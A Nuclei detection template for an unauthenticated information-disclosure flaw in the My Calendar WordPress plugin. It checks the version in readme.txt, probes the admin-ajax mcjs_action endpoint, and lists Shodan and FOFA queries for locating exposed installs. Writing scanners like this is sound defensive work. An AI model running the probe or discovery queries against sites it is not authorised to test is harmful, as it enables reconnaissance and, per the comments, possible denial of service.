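# Nuclei detection template for CVE-2026-40308 (My Calendar WordPress plugin <= 3.7.6).
# Two-step check: request 1 fingerprints the installed version from the plugin's
# readme.txt, request 2 confirms the unauthenticated admin-ajax endpoint answers.
# Both steps must match (see `flow`) before the template reports a hit.
id: CVE-2026-40308

info:
  name: My Calendar WordPress Plugin - Information Disclosure
  author: theamanrawat
  severity: high
  description: |
    My Calendar WordPress plugin <= 3.7.6 contains an injection vulnerability caused by unvalidated user input passed to parse_str() in mc_ajax_mcjs_action endpoint, letting unauthenticated attackers access or crash sites via switch_to_blog(), exploit requires WordPress Multisite or Single Site setup.
  impact: |
    Unauthenticated attackers can access private events on multisite or cause denial of service on single site installations.
  remediation: |
    Update to version 3.7.7 or later.
  reference:
    - https://github.com/joedolson/my-calendar/security/advisories/GHSA-2mvx-f5qm-v2ch
    - https://nvd.nist.gov/vuln/detail/CVE-2026-40308
  classification:
    cve-id: CVE-2026-40308
    epss-score: 0.02306
    epss-percentile: 0.85039
    cwe-id: CWE-639
  metadata:
    verified: true
    max-request: 2
    vendor: joedolson
    product: my-calendar
    framework: wordpress
    # Search-engine queries are quoted so the embedded quotes, `:` and `&&`
    # can never be re-parsed as YAML syntax; the string values are unchanged.
    shodan-query: 'http.html:"/wp-content/plugins/my-calendar/"'
    fofa-query: 'body="/wp-content/plugins/my-calendar/" && title="WordPress"'
  tags: cve,cve2026,wordpress,wp-plugin,my-calendar,idor,information-disclosure

# http(2) is only executed when http(1) matched (its matcher is `internal`)
# and the `version` extractor produced a value for the DSL comparison below.
flow: http(1) && http(2)

http:
  # Step 1: version fingerprint. The `Stable tag` in readme.txt reflects the
  # packaged release and can lag or lead the code actually deployed, so the
  # version gate is an approximation rather than proof of the vulnerable build.
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/my-calendar/readme.txt"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "My Calendar"
          - "Stable tag:"
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?m)Stable tag:\s*([0-9.]+)'
        internal: true

  # Step 2: confirm the unauthenticated `mcjs_action` AJAX handler is reachable.
  # `behavior=loadupcoming` is the plugin's upcoming-events read, `args` is left
  # empty and `site=1` names the primary blog. NOTE(review): the advisory text
  # above says switch_to_blog() can crash single-site installs — confirm this
  # probe is side-effect free on such installs before wide production scanning.
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=mcjs_action&behavior=loadupcoming&args&site=1"

    matchers-condition: and
    matchers:
      # A 200 response carrying the `"success":1` / `response` JSON envelope on a
      # version <= 3.7.6 is treated as a positive; this does not by itself prove
      # that private event data was exposed.
      - type: dsl
        dsl:
          - 'compare_versions(version, "<= 3.7.6")'
          - 'contains_all(body, "\"success\":1", "response")'
          - 'status_code == 200'
        condition: and
# Template signature line; any edit to the template above invalidates it until
# the template is re-signed.
# digest: 4a0a00473045022008ed3bbdbc2ef43d85d88bb10f072463a4b6437a5bd46a9d55d7f171443687a50221009e057bea0c1859255ada0bd1fb2bc7eb4fe3846ce324583692448e194efd5550:922c64590222798bb761d5b6d8e72950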